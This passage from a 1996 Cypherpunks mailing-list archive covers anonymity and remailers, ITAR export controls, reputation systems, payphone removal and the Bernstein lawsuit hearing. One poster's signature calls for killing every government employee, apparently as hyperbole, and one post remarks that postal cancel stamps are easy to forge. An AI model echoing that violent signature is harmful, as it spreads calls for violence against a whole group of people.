overrun holes and it was just too easy to use netscape to exploit them. Jeff or another of the people from NS probably can give the full explanation. --- Fletch __`'/| fletch at ain.bls.com "Lisa, in this house we obey the \ o.O' ______ 404 713-0414(w) Laws of Thermodynamics!" H. Simpson =(___)= -| Ack. 
| 404 315-7264(h) PGP Print: 8D8736A8FC59B2E6 8E675B341E378E43 U ------ From schmidt at pin.de Fri Sep 6 05:08:03 1996 From: schmidt at pin.de (Stephan Schmidt) Date: Fri, 6 Sep 1996 20:08:03 +0800 Subject: Herr Schmidt In-Reply-To: Message-ID: > (I also don't dislike Germans in general. I studied some German in high > school--don't ask me to use it, though!--and have visited Germany. They > just have a certain well-known tendency to take the authoritarian path at > times.) Agreed :) I talked to someone about censorship here in Germany and we both think there is not much around. Germans are always amused when american film stars come to a German tv show and ask if they can use words like fuck on tv. Or the beeps in some songs on mtv Europe. The only big 'censorship' in Germany concerns extrem left and right wing texts etc (e.g. 'Ausschwitzluege', which is, when someone says ausschwitz is a lie), because it's illegal to distribute such things. And some censorship is involved in selling video games, although the concept is often misunderstood in the US. Video Games are not censored and can be bought by adults. It's only prohibited to sell these things to kids. And to this 'Herr Schmidt': most of the people I know are amused about 'Anglos' using this Herr XXX (say on skyone, nbc, etc.) stuff, because no German uses this phrase in this way :) And I thought cypherpunks are more open, concerning some mails I received. I think I had to say this, so don't bother. -stephan PS: and to those who mailed : it`s stephan not stephen ;) From tcmay at got.net Fri Sep 6 05:50:17 1996 From: tcmay at got.net (Timothy C. May) Date: Fri, 6 Sep 1996 20:50:17 +0800 Subject: Metcalf and Other Net.Fogies Message-ID: I'm evolving a hunch that the problems we're seeing with "old fogies" denouncing the Net, and anonymity, and "smut on the Net," are part of a larger cultural issue. Namely, the familiar case of an older generation complaining about the sloth and sin of the younger generations. 
(Caveat: I'm 44, so I'm certainly a generation older than many of you, and am about the same age, give or take a few years, of Dyson, Metcalfe, Kapor, Denning, and the other Net.Doomsayers. However, 20-25 years ago, when I was in college, I recall of course similar predictions of disaster. (And as it turned out, the predictions that promiscuity would lead to a disaster turned out to be partly correct, viz. AIDS.)) Robert Metcalfe, inventor of Ethernet and founder of 3COM, and how publisher of "Infoworld" and sailing enthusiast, was interviewed on CNBC a few minutes ago. He repeated his prediction of an "Internet collapse" in 1996, based on overuse, on bad pricing models, on lack of controls, and on other concerns. It could be that the Dennings, Dysons, Kapors, etc. of the world are simply growing jaded with the Net and are projecting their own ennui in their comments that the Net may need to be controlled. This may come with age, as I'm sure the Kapor of 25 years ago would not have wanted President Nixon and Attorney-General Mitchell telling him what he could read and write. (In fairness, none of these folks listed have called for censorship. But all have expressed "concerns" of one sort or another. Not that discussing concerns is inappropriate--after all, we do it all the time. But I sense in many of their phrasings of concerns a stereotypical "old fogeyness" emerging.) Just a thought. Maybe the solution to the EFF problem is to "not trust anyone over 30." --Tim May (untrustable since 1981) We got computers, we're tapping phone lines, I know that that ain't allowed. ---------:---------:---------:---------:---------:---------:---------:---- Timothy C. May | Crypto Anarchy: encryption, digital money, tcmay at got.net 408-728-0152 | anonymous networks, digital pseudonyms, zero W.A.S.T.E.: Corralitos, CA | knowledge, reputations, information markets, Higher Power: 2^1,257,787-1 | black markets, collapse of governments. 
"National borders aren't even speed bumps on the information superhighway." From jimbell at pacifier.com Fri Sep 6 05:52:17 1996 From: jimbell at pacifier.com (jim bell) Date: Fri, 6 Sep 1996 20:52:17 +0800 Subject: Race Bit: C Message-ID: <199609060330.UAA27245@mail.pacifier.com> At 02:11 PM 9/5/96 +0000, jonathon wrote: >On Thu, 5 Sep 1996, Anonymous wrote: >> defunded 100%, IMO). Violence begats violence which begats even larger >> government, don't start us on that road -- leave me in peace. >If I understand you correctly, it is OK for a government to >institute violence against the residents of the land it claims >dominion over, but it is not acceptable for the inhabitants of >that piece of land to respond in self defence. I think Mr. Anonymous displays a mental crutch that you'll occasionally see: A person who, while he'll not quite admit defending the status quo, criticizes alternatives to it yet doesn't have a solution of his own. He says he wants to be left "in peace," forgetting that most people in the world today are NOT left in peace. The way I see it, the status quo doesn't come "pre-justified": It needs just as much a defense as any other proposal. Its main advantage is that it tends to be more understood that most hypotheticals, because it's been tested. Sadly, people tend to ignore its disadvantages, to to excess familiarity. Jim Bell jimbell at pacifier.com From grafolog at netcom.com Fri Sep 6 06:16:07 1996 From: grafolog at netcom.com (jonathon) Date: Fri, 6 Sep 1996 21:16:07 +0800 Subject: Race Bit: C In-Reply-To: <199609060330.UAA27245@mail.pacifier.com> Message-ID: On Thu, 5 Sep 1996, jim bell wrote: > The way I see it, the status quo doesn't come "pre-justified": It needs > just as much a defense as any other proposal. 
Its main advantage is that it > tends to be more understood that most hypotheticals, because it's been More understood, and just more accepted, because alternatives are hard to conceive, and even harder to popularize, without lots of red liquid running in the streets? xan jonathon grafolog at netcom.com On second thoughts, let's just terminate with extreme prejudice, each and every individual who has worked in any capacity for any part of any government agency in the us -- regardless of whether it was federal, state or local, and regardless of whether they were president, janitor, or clerk. All people in the employ of government agencies are death-dealers. From ponder at freenet.tlh.fl.us Fri Sep 6 06:23:16 1996 From: ponder at freenet.tlh.fl.us (P. J. Ponder) Date: Fri, 6 Sep 1996 21:23:16 +0800 Subject: rc2 export limits.. In-Reply-To: <199609051547.LAA07458@jekyll.piermont.com> Message-ID: keywords: block cipher, Bruce Schneier, SHA, ITAR Thanks to Perry Metzger and Andrew Loewenstern for their responses to my question viz: Why is SHA export controlled? I should always check _Applied Cryptography_ first before I ask a question. And I guess now that I have two copies, I could leave the red one at the office and bring the blue one home. I didn't reply to Andrew Loewenstern and Perry Metzger separately, because I think they both read the list, and I think replying to both might be bad form in those cases where the person is known to read the list. on the subject of anonymity, maybe some folks have yet to understand the binary nature of it. If there are exceptions to anonymous writing that can be enforced against the writer, then it's over. Either others will be able to compel discovery of anonymous writers' True Names or they won't. If methods exist that permit writers to remain anonymous with very high degrees of assurance that their true identities will not be found out, then we will have anonymity. It's either one or the other. 
Anonymity can be used to produce hate speech, lies, posting of intellectual property, and other things that many of us would rather not see. But, that is the price of having anonymity where it is needed and valuable. From vznuri at netcom.com Fri Sep 6 06:33:18 1996 From: vznuri at netcom.com (Vladimir Z. Nuri) Date: Fri, 6 Sep 1996 21:33:18 +0800 Subject: Voluntary Disclosure of True Names In-Reply-To: Message-ID: <199609051749.KAA12335@netcom20.netcom.com> TCM >>I think cpunks should hold the view that communication is a matter >>of mutual consent between sender and receiver. if a receiver says, >>"I don't want any anonymous messages", then should be able to block them. > >But this is precisely what nearly all of us have been arguing. Namely, that >the issue of anonymity vs. providing of True Names, is a matter of >_contract_ between parties, not something the government is justified in >sticking its nose into. well, I was satirizing the "extremist cpunk position" which is stronger than the above. I noticed you didn't use the cpunk four-letter-word, "we", but used a nearly equivalent construction. I have seen it repeated here often that somehow anonymity is some kind of a "right" that one should have in all kinds of different & important transactions, not merely on "cyberspace debate societies". I see here frequently the implication that *private*entities* that want to enforce identity in their own transactions are somehow implementing a corrupt, orwellian system. it sounded to me like that was all Dyson was advocating. also, I think you are being slightly disingenuous in masking your own and other cpunks major objections to traceability, with the above, "this is all we really want". what about situations where the government requires you to give a physical identity for some kind of a license etc? do you think there are no such valid situations? 
is there any role for a government whatsoever in CryptoAnarchist Utopia and if so, is there any situation in which demanding physical identity is reasonable? >No, Dyson said "Therefore I would favor allowing anonymity -- with some >form of traceability only under terms considerably stronger than what are >generally required for a wiretap." > >This implies a role for government, and concomitant restrictions on related >anonymity technologies, to provide traceability. So much for mutual >agreement between sender and recipient. it's clear Dyson hasn't totally thought out her position on anonymity. imho you are reading too much into her existing positions. because of your government paranoia, you assume that when someone says they want traceability, they are implying they want the government to enforce it in all situations. >(I have nothing against senders and recipients agreeing to use the services >of some third party in providing ultimate traceability. I'm not wild about >the U.S. Government being this third party, paid for by tax money, but so >long as it is not required, it's a minor concern to me. that's what something like what Dyson has been referring to would suggest to me. that is, that's exactly the system she sounded like she was loosely advocating. I surmise, though, >that use of the U.S. Government as a third party would not be optional, in >the schemes of Dyson, Denning, and others of that ilk.) Denning, yes; Dyson, I don't think so. remember Dyson has written extensively on the subject of "the end of copyright" in some very interesting essays and ideas. one major reason you would want to enforce traceability in cyberspace would be to prevent copyright infringement. so by attacking or "reforming" the concept of copyright, I'd say Dyson is very close to cpunk agendas and ideals from what I have loosely seen. there is something I've observed among extremists. 
by arguing for an extreme position, they tend to polarize the world and push away proposals that may actually benefit themselves in the long run. in other words, a system A that is "close" to their goals comes along, and if implemented would support them with some minor compromises. but the extremists, such as there are many on this list, say, "A is not good enough for us". but then the window of opportunity is closed, and all future proposals B, C, D, etc. are even worse and one may even get implemented. so it becomes very important to "know when to settle". extremists think that they are promoting their goals when they reject anything less than perfect, when in fact they may be sabotaging their own agenda in doing so. one example I have brought up before: the post office is setting up a digital signature system. it could be a good way for cpunks to educate the public, to get crypto to the masses, and to put in safeguards that prevent misuse and try to guarantee it will be voluntary. but intead they flame it as the beginning of Big Brother. the problem is the mindset that "if its associated with government, it is evil". this can be self-sabotaging. but again I'm arguing in subtleties that few here will grasp so I think I'll just quit while I'm behind From pstira at escape.com Fri Sep 6 06:45:10 1996 From: pstira at escape.com (pstira at escape.com) Date: Fri, 6 Sep 1996 21:45:10 +0800 Subject: What is the EFF doing exactly? In-Reply-To: Message-ID: Not just DC and Chicago, I'm afraid. If anyone around NYC noticed, there are less and less payphones, and all new ones installed, just about, are those yellow credit card phones. Not all of them, but it's now one for one, at least. =Millie= PS: i wrote a fiction book about this a few years ago -- i should have published. People could've said i was the next nostradamus. :( On Wed, 4 Sep 1996, Black Unicorn wrote: > On Wed, 4 Sep 1996, Vladimir Z. 
Nuri wrote: > > > > > jim bell > > >"Addressed", maybe, but that doesn't necessarily mean, "solved." For many > > >decades, people have been able to walk up to a pay telephone at 3:00 AM and > > >make a harassing phone call to somebody, a "problem" which still exists and > > >no solution is being implemented for. > > Incidently, this is being "solved." > > In D.C. and Chicago the solution is to rip up the payphones and not permit > new ones to be installed. > > If anyone objects the officals responsible make a wide gesture and say "We > didn't take away your phones, CRIMINALS took away your phones." > > > amusing the way you phrase that-- you didn't say, "phone", but "pay > > phone". the statement used to hold in general for all "phones", but > > then caller id, caller blocking, etc. have been introduced that > > make this no longer true. so in a very real sense, anonymity in > > the phone system was considered a "problem" by some that has been > > "solved" or "modified" by some recent advancements. (yes, most people > > agree caller ID is an advancement). > > > > Yet today one can go out and rent a cell phone on the street, or even pay > for one's activation in cash up front without presenting any real identity > documents. > > The real question is this, what are you going to do to anihilate anonymous > communication, because if you think its harmful that's what you have to > do. > > -- > I hate lightning - finger for public key - Vote Monarchist > unicorn at schloss.li > > > From zaphoid at solgate.com Fri Sep 6 07:41:22 1996 From: zaphoid at solgate.com (Zaphoid _d00l) Date: Fri, 6 Sep 1996 22:41:22 +0800 Subject: No Subject Message-ID: <2.2.32.19960906120442.006a74b0@solgate.com> desubscribe From schmidt at pin.de Fri Sep 6 07:46:43 1996 From: schmidt at pin.de (Stephan Schmidt) Date: Fri, 6 Sep 1996 22:46:43 +0800 Subject: FWD: Another try to kill democracy In-Reply-To: Message-ID: September 6th, 14:00 CET, I can still access the url via our ISP. 
-stephan

From dee at cybercash.com Fri Sep 6 07:53:01 1996
From: dee at cybercash.com (Donald E. Eastlake 3rd)
Date: Fri, 6 Sep 1996 22:53:01 +0800
Subject: Conservation Laws, Money, Engines, and Ontology (fwd)
Message-ID:

Suggest you look at draft-eastlake-internet-payment-*.txt in the IETF shadow directories. I don't think any one step will solve all our spam problems but I wouldn't mind spending, say, 5 cents for each real piece of mail I sent outside my company and if end machines charged 5 cents per piece of outside mail received, I think spamming would be crippled. (Note that with bad guy lists, you could collect the money and then just throw away the mail.)

Donald (not on cypherpunks)
=====================================================================
Donald E. Eastlake 3rd +1 508-287-4877(tel) dee at cybercash.com
318 Acton Street +1 508-371-7148(fax) dee at world.std.com
Carlisle, MA 01741 USA +1 703-620-4200(main office, Reston, VA)
http://www.cybercash.com http://www.eff.org/blueribbon.html

---------- Forwarded message ----------
Date: Sun, 1 Sep 1996 19:47:15 -0400
From: Robert Hettinga
To: dcsb at ai.mit.edu
Subject: Conservation Laws, Money, Engines, and Ontology

Date: Sun, 1 Sep 1996 11:35:28 -0700
Mime-Version: 1.0
To: cypherpunks at toad.com
From: tcmay at got.net (Timothy C. May)
Subject: Conservation Laws, Money, Engines, and Ontology

Keywords: agoric systems, computational ecologies, resource auctioning, Mark Miller, K. Eric Drexler, Bernardo Huberman, contracts, distributed trust, metered usage, software objects, software ICs, superdistribution, Brad Cox, emergent order.

In physics there are various conservation laws: conservation of energy, mass, charge, and whatnot. You all know about this... Conservation of mass says that mass is neither created nor destroyed. (For smart aleck quibblers, conservation of mass-energy.)

How does this relate to our issues?

"Abuse of Resources": Mail loops, infinite loops, spamming, overloads of networks, and congestion in general are cases where "unrealistic" models of costs are implemented in software. In the real physical world, infinite loops don't occur (at least not in the sense seen with mail loops, as a relevant example.)

Conservation laws are related to the "cost model" of the universe. Real physical objects have costs, or ontological status, or presence.... (Please don't read too much into this point...I mean to be suggestive, not literal.) There are no "memory leaks" in the universe which suddenly fill it up with stuff, no perpetual motion machines, no creation and destruction of objects.

Cyberspace Ontologies: There are several things which need to be done to make the cyberspatial world more like the spatial world:

* payment for CPU cycles consumed (via contractual, permission-based access: "If you want access to this machine, here are the terms and conditions.")

* metering mechanisms, such as e-stamps for e-mail (essentially a special case of the first point, where a machine says "I'll pass on your message if you pay me to.")

* digital contracts, agreements on usage and payment (resource auctioning, or the "smart contracts" that Nick Szabo has written about)

(you can all think of additional examples....)

Cryptographic protocols have their uses here, but there are also some other measures which bear looking into. In the LISP community, for example, work has been done on "engines," which are building blocks that are "fueled up" with "CPU fuel" and allowed to run for some amount of CPU cycles. Thus, one could put an engine into a process and it would run for some number of ticks, then stop.

(I'm sure there are Unix-level tools which do similar things, in terms of giving a spawned process so many ticks of the clock.
The "engines" concept is somewhat more semantically clean, in that it's pushed down into the "ontology" of the thing being simulated or run, and is not at the "God level" (to use a non-technical term!).) Now, certainly I support the right of any person or machine to run programs freely and without charge, to pass on e-mail free of charge, to run remailers for no charge, to accept spam mail without complaint, and so on. What I'm suggesting is that many of the problems being seen with overuse of resources, spam, congestion, and denial of service are really due to a poor model of resource allocation. Unix and other modern operating systems offer various tools for helping to constrain such problems, but, I submit, better methods are needed. (Especially when multiple machines, networks, and even anonymous sites are part of the overall system....clearly the constraints must be managed locally, and via "contract," as part of a computational ecology, and not as a hierarchical, top down Unix-type operating system.) Economics is about the "allocation of scarce resources." Many of the existing models being used treat various scarce resources as _free_. Then, when the inevitable problems occur, calls for top-down regulation are heard (e.g., the frequent calls for illegalization of "unwanted mail"). In my view, building a consistent, distributed, "conservative" system is what Cypherpunks need to be thinking about. (I used the term "conservative" in the physics sense. A system in which various conservation laws are obeyed.) As I said before, this should not be compelled, but voluntary. However, those who give their resources away for free (choosing not to adopt a conservative ontology, in other words) should be in no position to complain or run to the government for top-down regulation because their freely-given resources are being overused or "abused" (in their thinking).
And closely related to this whole issue--and something I've written about extensively--is the issue of "building walls in cyberspace." In the real world, persistent structures are built out of real materials, resulting in castles, forts, skyscrapers, bridges, houses, highways, etc. These objects have persistence, have controllable access (gates, doors, locks,...), and have "structural integrity." Cryptographic and distributed trust protocols are about the only means I can think of for constructing the equivalents in cyberspace. (And to a large extent, this is already happening: the Net and the Web have structure which cannot be demolished casually, or by top-down orders from any single national leader. Millions of machines, linked in various ways and implementing various protocols and "terms of service" with users and other machines....an early version of the "conservative" system I think we'll someday see.) Well, this gives the flavor of my points. I haven't rigorously argued all of the points, but the Cypherpunks forum is for presenting informal arguments. Thoughts? --Tim May We got computers, we're tapping phone lines, I know that that ain't allowed. ---------:---------:---------:---------:---------:---------:---------:---- Timothy C. May | Crypto Anarchy: encryption, digital money, tcmay at got.net 408-728-0152 | anonymous networks, digital pseudonyms, zero W.A.S.T.E.: Corralitos, CA | knowledge, reputations, information markets, Licensed Ontologist | black markets, collapse of governments. "National borders aren't even speed bumps on the information superhighway." --- end forwarded text ----------------- Robert Hettinga (rah at shipwright.com) e$, 44 Farquhar Street, Boston, MA 02131 USA "'Bart Bucks' are not legal tender."
-- Punishment, 100 times on a chalkboard, for Bart Simpson The e$ Home Page: http://www.vmeng.com/rah/ ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ To unsubscribe from this list, send a letter to: Majordomo at ai.mit.edu In the body of the message, write: unsubscribe dcsb Or, to subscribe, write: subscribe dcsb If you have questions, write to me at Owner-DCSB at ai.mit.edu From wb8foz at nrk.com Fri Sep 6 08:27:01 1996 From: wb8foz at nrk.com (David Lesher) Date: Fri, 6 Sep 1996 23:27:01 +0800 Subject: 16oz packages In-Reply-To: <199609051928.OAA19142@bigeasy.com> Message-ID: <199609061201.IAA04873@nrk.com> > One is now instructed to take these packages to a post-office mail > clerk for mailing. > > (Of course it's unclear just what would be done if a package > weighing over that magical 16ozs was left in a mailbox) They get sent back. Was in line @ USPS. Guy showed up with 40-odd Priority Mail Packages that had come back. Clerk stamped each one & off they went. 1) It was obvious from conversation the customer was a local. 2) The hand cancel stamp is TRIVIAL to forge. After all, until now, who has WANTED to falsely zero-out the value of her stamps? -- A host is a host from coast to coast.................wb8foz at nrk.com & no one will talk to a host that's close........[v].(301) 56-LINUX Unless the host (that isn't close).........................pob 1433 is busy, hung or dead....................................20915-1433 From sandfort at crl.com Fri Sep 6 10:37:08 1996 From: sandfort at crl.com (Sandy Sandfort) Date: Sat, 7 Sep 1996 01:37:08 +0800 Subject: BAY AREA PARTY REMINDER Message-ID: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ SANDY SANDFORT . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . C'punks, We are at one week and counting until my Second Occasional Anarcho-Dilettante costume party. If you would like to attend please RSVP as soon as possible. 
If you did not get or keep the original invitation, let me know and I'll send you another copy. In addition to Cypherpunks and Extropians, there will be gun nuts, a contingent of Burning Man survivors and some total strangers. It will be one hell of a party. S a n d y ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ From jbugden at smtplink.alis.ca Fri Sep 6 10:40:46 1996 From: jbugden at smtplink.alis.ca (jbugden at smtplink.alis.ca) Date: Sat, 7 Sep 1996 01:40:46 +0800 Subject: Anonymous phone calls (was: What is the EFF doing exactly?) Message-ID: <9608068420.AA842029748@smtplink.alis.ca> There is another spin possible on the reasons for replacement of pay phones with credit card phones. In Canada all new credit card phones are also able to take phone cards (which are anonymous). Using a prepaid phone card permits full anonymity. But what it also permits is metered local calls. This infrastructure would be more familiar to someone from Europe where metered local calls are the norm. Paris made the change to phones that *only* take prepaid phone cards (thus fully anonymous) ostensibly because people were breaking into phones for the money. Prepaid phone cards avoid this. James Why should my long distance calling subsidize your local internet access? ;-) ---------- From: "" Sent: Friday, September 06, 1996 9:54 AM To: unicorn at schloss.li Cc: vznuri at netcom.com; cypherpunks at toad.com Subject: Re: What is the EFF doing exactly? Not just DC and Chicago, I'm afraid. If anyone around NYC noticed, there are less and less payphones, and all new ones installed, just about, are those yellow credit card phones. Not all of them, but it's now one for one, at least. From omega at bigeasy.com Fri Sep 6 10:50:56 1996 From: omega at bigeasy.com (Omegaman) Date: Sat, 7 Sep 1996 01:50:56 +0800 Subject: Reputations Message-ID: <199609061407.JAA23700@bigeasy.com> > I don't see how there can be such a thing as negative reputation > capital.
Wouldn't that mean B believes the opposite of what A says? If > you anti-believed someone in a consistent manner, couldn't they exploit > that? Of course they could exploit that. But you're not "anti-believing" the information an untrusted party is passing. Rather, you are not acting on their information in *any* fashion. You're ignoring them. In the case of the common killfile, you may not even know that they're talking at you. > Also, you are speaking only of 1-to-1 reputation-relationships. But that > is inefficient. The mere fact of having to evaluate each person's > reputation yourself is significant work. It is significant work. How much work depends on how valuable the transactions you are considering are to you. It's not as if the notion of reputation capital doesn't have precedent. When I make a purchase for my business, I do quite a bit of checking on the background of individuals and businesses I am purchasing from. The amount of reference work I do depends on how much I intend to spend. Furthermore, I am much more apt to do business with individuals who have been referred by other trusted parties (a transfer of reputation capital). Also my initial investment with a relative unknown is usually small. The reputation capital of both parties increases relative to one another as a relationship is continued. > On the other hand, you could talk about the transmission of reputations. [..snip..] > For instance, when a certain infamously-low-reputation (deservedly so) > individual recently joined the cypherpunk lists, others who had endured > him in the past tried to relay their impressions of him. It proved very > difficult to convey, and they were somewhat attacked for their efforts > and not entirely believed. You seem to view the notion of reputation capital as absolute. It is relative to each user of it. The unnamed you are referring to did indeed come in with quite a bit of negative reputation capital attached to his name.
While I might regard the opinions of others on the list as being valuable, I chose to see for myself if the unnamed person warranted his bad reputation. > In other words, he *could not* spend down to 0, despite years of > unflagging effort. In other words, I decide if and when he has "spent down to zero" with me -- even if we never directly communicate. > Now, suppose J. Anonymous Gourmand spams all of Usenet, and millions of > people who have never heard of J. Anonymous Gourmand before read a > plausible but false account of the disgustingness of McDonald's food. > Perhaps the same detailed study, just fake. (Not to intertangle this > with other issues, let's further suppose that Ms. Gourmand sneaks in > underneath spam-watcher's radar, and cleverly appears to be on topic in > every group.) > > Nothing about her reputation has changed, but surely when her claim is > read by millions it will hurt McDonalds a non-trivial amount. Why? That depends on the sophistication of millions of Usenet readers (heh). I think your extension of this example is not useful. It's impossible not to "intermingle it with other issues" such as the substance of the message itself, the ability to verify any factual information, etc. etc. ad nauseam. Reputation is but one factor in many and has a mostly negative effect if J. Anonymous Gourmand is indeed anonymous. Change J. Anonymous Gourmand to say, C. Everett Koop, and you can envision a more tangible example of reputation capital in action. me -------------------------------------------------------------- Omegaman PGP Key fingerprint = 6D 31 C3 00 77 8C D1 C2 59 0A 01 E3 AF 81 94 63 Send a message with the text "get key" in the "Subject:" field to get a copy of my public key. -------------------------------------------------------------- From declan at well.com Fri Sep 6 10:51:24 1996 From: declan at well.com (Declan McCullagh) Date: Sat, 7 Sep 1996 01:51:24 +0800 Subject: U.K.
cyberporn fearstorm, Singapore attacks Julf, from HotWired Message-ID: Sgt. Toby Tyler is actually a bit of a cypherpunk. He told me he "absolutely" supports anonymous remailers -- repressive governments in Asia and all that. He just doesn't think that many people will use 'em. -Declan ---------- Forwarded message ---------- Date: Fri, 6 Sep 1996 05:55:26 -0700 (PDT) From: Declan McCullagh To: fight-censorship at vorlon.mit.edu Subject: U.K. cyberporn fearstorm, Singapore attacks Julf, from HotWired [Also in today's Netizen on HotWired is a report from India on their Net-regulations and Brock in Muckraker on the White House's new "Key Recovery Initiative" anti-crypto legislation. Check out http://www.hotwired.com/ --Declan] ********** http://www.hotwired.com/netizen/96/36/index4a.html HotWired, The Netizen 6-8 Sept 96 Finnish Line by Declan McCullagh Washington, DC, 5 September Call it a cyberporn fear-storm: Splashed across the front page of the 25 August issue of the London Observer was a hysterical report naming Finnish pseudonymous remailer operator Julf Helsingius as the "man US police-experts charge with being at the hub of 90 percent of the child pornography on the Internet." The report continued: "'Somewhere between 75 and 90 percent of all the child pornography I see is supplied through this remailer,' said Toby Tyler of the FBI." That was enough to make Helsingius - already reeling under threats from the Singapore government and repeated legal attacks from the always-litigious Church of Scientology - pull the plug on his anon.penet.fi site last Friday. But in trying to milk the story, the Observer went too far. The "FBI investigator" the paper cited as their only support for the accusations doesn't exist. In truth, Tyler is a sergeant in California's San Bernardino sheriff's office, and he says the Observer intentionally misrepresented his identity and his statements. 
Tyler says "there's very little of the story I agree with," and the Observer took a conversation he had with a reporter "and selectively chose words that would mean what they wanted." [...] Helsingius blames the Observer for scaremongering. "It was quite clear that they were trying to create a story where there was none ... I quite clearly outlined why my server wasn't transmitting child porn," Helsingius said. "I stated that the Finnish police had investigated and found that it wasn't. These comments were ignored. They wanted to make a story so they made things up." [...] Still, a malicious front-page splash in the Observer isn't the full extent of Helsingius's troubles. Now he's also up against the Singapore government, which has demanded the identity of one of the users in his half-million-person database... The unknown user, who has the email address an511172 at anon.penet.fi, posted hundreds of messages to the soc.culture.singapore newsgroup under the name of "Lee Kwan Yew," the retired prime minister of Singapore. The messages are short and unimaginative, yet apparently are just enough to piss off the thin-skinned Singaporean officials. One post reads: "We are small and vulnerable. Without regulations, we will be like Hong Kong, oops, fuck, bad example, they are actually doing quite all right. - SM Lee Kwan Yew, Republic of Singapore." Now that a Finnish court recently ruled that the remailer's database could be breached in a Scientology case, Helsingius says he's not sure what might happen. In the meantime, he's stuck somewhere between a sensationalist British newspaper and a Singaporean government bent on silencing opposition. [...] 
Links from the article: Linkname: hysterical report in London Observer Filename: http://www.scallywag.com/obtext.htm Linkname: Singapore banning Web pages Filename: http://www.eff.org/~declan/global/sg/ Linkname: hundreds of messages pseudonymously posted Filename: http://www.eff.org/~declan/global/sg/anon.posts.090596.txt ### From stevenw at best.com Fri Sep 6 10:55:14 1996 From: stevenw at best.com (Steven Weller) Date: Sat, 7 Sep 1996 01:55:14 +0800 Subject: CFP 97: Burlingame, CA Message-ID: Forwarded from RISKS: ------------------------------ Date: Tue, 3 Sep 1996 12:37:14 -0700 (PDT) From: Bruce R Koball Subject: 7th Computers, Freedom, and Privacy THE SEVENTH CONFERENCE ON COMPUTERS, FREEDOM, AND PRIVACY Call for Participation San Francisco Airport Hyatt Regency Hotel Burlingame, California 11-14 March 1997 CFP97: Commerce & Community will be sponsored by the Association for Computing Machinery SIGCOM and SIGSAC. The host institutions will be Stanford University and the University of California at Berkeley. Co-sponsors and cooperating organizations include the ACM SIGCAS, the Electronic Frontier Foundation, the Center for Democracy and Technology, the Electronic Privacy Information Center, and the WELL. CFP97: Commerce & Community is the latest in a series of annual conferences assembling a diverse group of experts and advocates from the domains of technology, business, government, and academia to explore the evolution of information and communication technologies and public policy, and its effects on freedom and privacy in the United States and throughout the world. Past CFP sessions have discussed, debated -- and often anticipated -- issues of great social import.
In this tradition, CFP97: Commerce & Community will examine the social and policy questions posed by: * the growth of electronic communities; * electronic commerce and the commercialization of cyberspace; * the problems of legal and regulatory control of the Net; * the interests of privacy and property in the electronic domain; * high-tech law enforcement and security concerns. The CFP97 Program Committee invites your suggestions for presentations on these or other important issues at the nexus of technology, business, public policy, freedom, and privacy. Proposals may be for individual talks, panel discussions, debates, moot courts, moderated, interactive sessions or other formats. Each proposal should be accompanied by a one-page statement describing the topic and format. Descriptions of multi-person presentations should include a list of proposed participants and session chair. Proposals should be sent by e-mail to cfp97 at cfp.org. If necessary, typewritten proposals may be sent to: CFP'97, 2210 Sixth Street, Berkeley, CA 94710. Please submit your proposal as soon as possible. The deadline for submissions is 1 October 1996. (Please note that we have extended our deadline for submissions) For more information on the Computers, Freedom and Privacy Conferences, as well as up-to-date announcements on CFP'97, please visit our Web page at: http://www.cfp.org ------------------------------ ------------------------------------------------------------------------- Steven Weller | Technology (n): | | A substitute for adulthood. stevenw at best.com | Popular with middle-aged men. From dthorn at gte.net Fri Sep 6 11:18:32 1996 From: dthorn at gte.net (Dale Thorn) Date: Sat, 7 Sep 1996 02:18:32 +0800 Subject: Neo-Nazis etc. Message-ID: <322F9867.7FEF@gte.net> Try to keep in mind that "Nazis" aren't skinheads and other troublemakers exactly, which is to say, those are the first people Hitler got rid of when he came to power. 
Real Nazis are/were bureaucrats; cold, calculating, bureaucratic. Do we know anyone like that? From gnu at toad.com Fri Sep 6 11:18:32 1996 From: gnu at toad.com (John Gilmore) Date: Sat, 7 Sep 1996 02:18:32 +0800 Subject: Sep 20th SF C'punks meeting: ITAR on trial Message-ID: <199609061051.DAA05601@toad.com> We're having another "Cypherpunks Dress-Up Day" on Friday, September 20th. Meet at the Federal Building in San Francisco, 450 Golden Gate Avenue, at 11:45AM, in high-quality business drag. [There will also be a regular Saturday meeting this month, on Sep 14.] It's been eleven months to the day since our first hearings in Dan Bernstein's lawsuit against the NSA and State Department. At this hearing, starting at High Noon, we hope to convince Judge Marilyn Hall Patel to declare that the ITAR (export regulations) and AECA (export law) are unconstitutional. We are asking her to order the State Department to immediately stop enforcing them with respect to cryptographic software. Simultaneously, the government is asking her to declare that their actions have been completely legal and Constitutional, and to throw out our lawsuit. Judge Patel has asked both sides to fully explore all the legal issues in the case for this hearing, leaving aside any unresolved factual questions (like exactly how many people have had their exports denied). She plans to decide the questions: * Should the government's actions be examined under the "strict scrutiny" appropriate when they attempt to restrict speech, or under a looser "O'Brien" test that applies when the government seeks to restrict conduct and only incidentally restricts speech? * Is the ITAR Scheme a prior restraint on speech? * Does the ITAR Scheme impermissibly punish speech after the fact? * Is the ITAR Scheme too vague to constitutionally regulate speech? * Is the ITAR Scheme so broadly worded that it unconstitutionally limits speech protected by the First Amendment? 
* Were the government's actions as applied to Dan Bernstein unconstitutional restrictions on his First Amendment rights? It's possible, but unlikely, that the judge will decide some of this then-and-there. Instead, we will get some insights into how she is leaning, based on her questions and comments. Her written decision will come out some weeks or months later. She then plans to certify the case for immediate appeal to a higher court (the Ninth Circuit, also here in San Francisco), to confirm or deny her legal analysis. From there it will probably go to the Supreme Court. Watch the wheels of justice grind! Meet the intrepid lawyers who are working hard to protect our rights! Shake hands with one or more NSA representatives specially flown in for the occasion! Meet some journalists and be quoted talking about crypto freedom! We will follow the hearing with a group lunch at Max's Opera Plaza, a block away at Van Ness Avenue and Golden Gate Avenue. As background, Dan Bernstein, ex-grad-student from UC Berkeley, is suing the State Department, NSA, and other agencies, with help from the EFF. These agencies restrained Dan's ability to publish a paper, as well as source code, for the crypto algorithm that he invented. We claim that their procedures, regulations, and laws are not only unconstitutional as applied to Dan, but in general. Full background and details on the case, including all of our legal papers (and most of the government's as well), are in the EFF Web archives at: 